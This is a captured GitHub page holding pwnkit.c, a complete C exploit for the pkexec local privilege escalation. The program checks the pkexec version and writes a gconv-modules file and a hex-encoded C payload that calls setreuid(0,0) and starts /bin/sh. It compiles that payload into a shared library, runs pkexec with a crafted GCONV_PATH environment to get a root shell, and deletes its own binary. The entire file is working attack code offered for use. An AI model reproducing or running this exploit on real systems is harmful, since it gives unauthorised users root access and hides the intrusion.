-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpwnkit.c
137 lines (103 loc) · 4.48 KB
/
pwnkit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <string.h>
#include <signal.h>
#include <wait.h>
#include <fcntl.h>
unsigned char *compile = "/usr/bin/gcc";
unsigned char *path = "/usr/bin/pkexec";
int checkConditions(void);
void exploitVuln(void);
void sighandler(int signum);
void sighandler(int signum){
fprintf(stderr, "/bin/pkexec - suid bit is not set to the binary (Not Vulnerable)\n");
_exit(0);
}
int checkConditions(void){
if (access(compile, F_OK)){
fprintf(stderr, "/bin/gcc - not installed considered using a 'self-contained' binary\n");
_exit(-1);
}
if (access(path, F_OK)){
fprintf(stderr, "%s - Is not available (Nothing to exploit)", path);
_exit(1);
}
int pipefds[2]; pid_t pid; char version[32];
if (pipe(pipefds)) abort();
pid = fork();
if (pid < 0){
close(pipefds[0]);
close(pipefds[1]);
_exit(-1);
}
if(!pid){
close(pipefds[0]);
dup2(pipefds[1], 1);
char *args[] = {path, "--version", NULL};
execv(path, args);
}
waitpid(pid, NULL, 0);
close(pipefds[1]);
read(pipefds[0], version, sizeof version);
version[strcspn(version, "\n")] = 0x0;
char *pch = strtok(version, " ");
int count = 2;
while(count > 0){pch = strtok(NULL, " "); count--;}
if (strverscmp(pch, "0.105") > 0)
return -1;
return 1;
}
void exploitVuln(){
// this is where we exploit the vulnerability
char *compile_args[] = {compile, "-shared", "-fPIC", "-o", "./tmp/preload.so", "./tmp/preload.c", NULL};
char *pkexec_args[] = {NULL};
char *pkexec_envp[] = {"tmp", "CHARSET=EXPLOIT", "SHELL=xxx", "PATH=GCONV_PATH=.", NULL};
char buffer[] = {
0x6d, 0x6f, 0x64, 0x75, 0x6c, 0x65, 0x20, 0x55, 0x54, 0x46, 0x2d, 0x38, 0x2f, 0x2f, 0x20,
0x45, 0x58, 0x50, 0x4c, 0x4f, 0x49, 0x54, 0x2f, 0x2f, 0x20, 0x70, 0x72, 0x65, 0x6c, 0x6f,
0x61, 0x64, 0x20, 0x32, 0x0
};
char code[] = {0x23, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x20, 0x3c, 0x73, 0x74, 0x64, 0x6c, 0x69, 0x62, 0x2e, 0x68, 0x3e, 0xa, 0x23, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x20, 0x3c, 0x75, 0x6e, 0x69, 0x73, 0x74, 0x64, 0x2e, 0x68, 0x3e, 0xa, 0xa, 0x76, 0x6f, 0x69, 0x64, 0x20, 0x67, 0x63, 0x6f, 0x6e, 0x76, 0x28, 0x29, 0x7b, 0x7d, 0xa, 0xa, 0x76, 0x6f, 0x69, 0x64, 0x20, 0x67, 0x63, 0x6f, 0x6e, 0x76, 0x5f, 0x69, 0x6e, 0x69, 0x74, 0x28, 0x29, 0x7b, 0xa, 0x9, 0x73, 0x65, 0x74, 0x72, 0x65, 0x75, 0x69, 0x64, 0x28, 0x30, 0x2c, 0x20, 0x30, 0x29, 0x3b, 0xa, 0x9, 0x73, 0x65, 0x74, 0x72, 0x65, 0x67, 0x69, 0x64, 0x28, 0x30, 0x2c, 0x20, 0x30, 0x29, 0x3b, 0xa, 0x9, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2a, 0x61, 0x72, 0x67, 0x73, 0x5b, 0x5d, 0x20, 0x3d, 0x20, 0x7b, 0x22, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x22, 0x2c, 0x20, 0x4e, 0x55, 0x4c, 0x4c, 0x7d, 0x3b, 0xa, 0x9, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2a, 0x65, 0x6e, 0x76, 0x70, 0x5b, 0x5d, 0x20, 0x3d, 0x20, 0x7b, 0x22, 0x50, 0x41, 0x54, 0x48, 0x3d, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x67, 0x61, 0x6d, 0x65, 0x73, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x22, 0x2c, 0x20, 0x4e, 0x55, 0x4c, 0x4c, 0x7d, 0x3b, 0xa, 0xa, 0x9, 0x65, 0x78, 0x65, 0x63, 0x76, 0x65, 0x28, 0x61, 0x72, 0x67, 0x73, 0x5b, 0x30, 0x5d, 0x2c, 0x20, 0x61, 0x72, 0x67, 0x73, 0x2c, 0x20, 0x65, 0x6e, 0x76, 0x70, 0x29, 0x3b, 0xa, 0x7d, 0xa, 0x0};
unsigned int fd, total = 0, got = 1;
mkdir("GCONV_PATH=.", 0755);
open("GCONV_PATH=./tmp", O_CREAT, 0755);
mkdir("tmp", 0755);
fd = open("./tmp/gconv-modules", O_CREAT|O_WRONLY, 0755);
if (fd <0) abort();
while(got == 1 && *buffer != 0x0 && total < strlen(buffer)){
got = write(fd, (char *)(buffer + total), 1);
total++;
}
close(fd);
fd = open("./tmp/preload.c", O_CREAT|O_WRONLY, 0644);
if (fd < 0) abort();
got = 1; total = 0;
while(got == 1 && *code != 0x0 && total < strlen(code)){
got = write(fd, (char *)(code + total), 1);
total++;
}
pid_t pid;
pid = vfork();
if(pid < 0) abort();
if (!pid){
execv(compile, compile_args);
}
waitpid(pid, NULL, 0);
execve(path, pkexec_args, pkexec_envp);
}
int main(int argc, char **argv){
struct sigaction act;
act.sa_handler = &sighandler;
sigemptyset(&act.sa_mask);
sigaction(SIGSEGV, &act, NULL);
unlink(argv[0]);
chdir("/tmp");
if (checkConditions()){
fprintf(stderr, "---[ version() is vulnerable\n");
exploitVuln();
}else fprintf(stderr, "---[ version() doesn't seem vulnerable\n");
}